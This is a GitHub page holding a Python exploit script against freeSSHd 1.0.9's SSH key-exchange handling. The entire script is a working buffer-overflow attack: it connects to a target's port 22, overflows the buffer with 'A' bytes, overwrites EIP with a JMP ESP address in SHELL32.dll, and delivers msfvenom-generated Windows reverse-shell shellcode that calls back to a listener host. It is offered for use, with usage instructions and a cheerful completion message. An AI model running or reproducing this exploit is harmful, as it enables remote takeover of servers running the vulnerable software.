-
Notifications
You must be signed in to change notification settings - Fork 1
/
freeSSHd1.0.9-KeyExchangeAlgorithmBufferOverflow.py
52 lines (52 loc) · 2.58 KB
/
freeSSHd1.0.9-KeyExchangeAlgorithmBufferOverflow.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#!/usr/bin/env python
import socket,sys,time
#How To Use: ./exploit.py [target]
def connection():
global s
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1],22))
print s.recv(1024)
def exploit():
connection()
header_start = "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48" \
"\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
junk = 1055 * '\x41'
eip = '\x3F\x9E\xB7\x7C' #JMP ESP SHELL32.dll 7CB79E3F
nop = 100 * '\x90'
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.127.129 LPORT=1453 -b '\x00' -f py
buf = ""
buf += "\xdb\xc5\xd9\x74\x24\xf4\xba\xf2\x1c\x60\xa4\x58\x33"
buf += "\xc9\xb1\x52\x31\x50\x17\x03\x50\x17\x83\x32\x18\x82"
buf += "\x51\x4e\xc9\xc0\x9a\xae\x0a\xa5\x13\x4b\x3b\xe5\x40"
buf += "\x18\x6c\xd5\x03\x4c\x81\x9e\x46\x64\x12\xd2\x4e\x8b"
buf += "\x93\x59\xa9\xa2\x24\xf1\x89\xa5\xa6\x08\xde\x05\x96"
buf += "\xc2\x13\x44\xdf\x3f\xd9\x14\x88\x34\x4c\x88\xbd\x01"
buf += "\x4d\x23\x8d\x84\xd5\xd0\x46\xa6\xf4\x47\xdc\xf1\xd6"
buf += "\x66\x31\x8a\x5e\x70\x56\xb7\x29\x0b\xac\x43\xa8\xdd"
buf += "\xfc\xac\x07\x20\x31\x5f\x59\x65\xf6\x80\x2c\x9f\x04"
buf += "\x3c\x37\x64\x76\x9a\xb2\x7e\xd0\x69\x64\x5a\xe0\xbe"
buf += "\xf3\x29\xee\x0b\x77\x75\xf3\x8a\x54\x0e\x0f\x06\x5b"
buf += "\xc0\x99\x5c\x78\xc4\xc2\x07\xe1\x5d\xaf\xe6\x1e\xbd"
buf += "\x10\x56\xbb\xb6\xbd\x83\xb6\x95\xa9\x60\xfb\x25\x2a"
buf += "\xef\x8c\x56\x18\xb0\x26\xf0\x10\x39\xe1\x07\x56\x10"
buf += "\x55\x97\xa9\x9b\xa6\xbe\x6d\xcf\xf6\xa8\x44\x70\x9d"
buf += "\x28\x68\xa5\x32\x78\xc6\x16\xf3\x28\xa6\xc6\x9b\x22"
buf += "\x29\x38\xbb\x4d\xe3\x51\x56\xb4\x64\x9e\x0f\xc9\xf5"
buf += "\x76\x52\x35\xf3\x2b\xdb\xd3\x91\x23\x8a\x4c\x0e\xdd"
buf += "\x97\x06\xaf\x22\x02\x63\xef\xa9\xa1\x94\xbe\x59\xcf"
buf += "\x86\x57\xaa\x9a\xf4\xfe\xb5\x30\x90\x9d\x24\xdf\x60"
buf += "\xeb\x54\x48\x37\xbc\xab\x81\xdd\x50\x95\x3b\xc3\xa8"
buf += "\x43\x03\x47\x77\xb0\x8a\x46\xfa\x8c\xa8\x58\xc2\x0d"
buf += "\xf5\x0c\x9a\x5b\xa3\xfa\x5c\x32\x05\x54\x37\xe9\xcf"
buf += "\x30\xce\xc1\xcf\x46\xcf\x0f\xa6\xa6\x7e\xe6\xff\xd9"
buf += "\x4f\x6e\x08\xa2\xad\x0e\xf7\x79\x76\x3e\xb2\x23\xdf"
buf += "\xd7\x1b\xb6\x5d\xba\x9b\x6d\xa1\xc3\x1f\x87\x5a\x30"
buf += "\x3f\xe2\x5f\x7c\x87\x1f\x12\xed\x62\x1f\x81\x0e\xa7"
fuzzer = header_start + junk + eip + nop + buf + (22000 -(len(header_start) + len(junk) + len(eip)))*'\x43' + '\r\n'
s.send(fuzzer)
print s.recv(1024)
time.sleep(10)
s.close()
print "\n Exploit Completed :) \n"
exploit()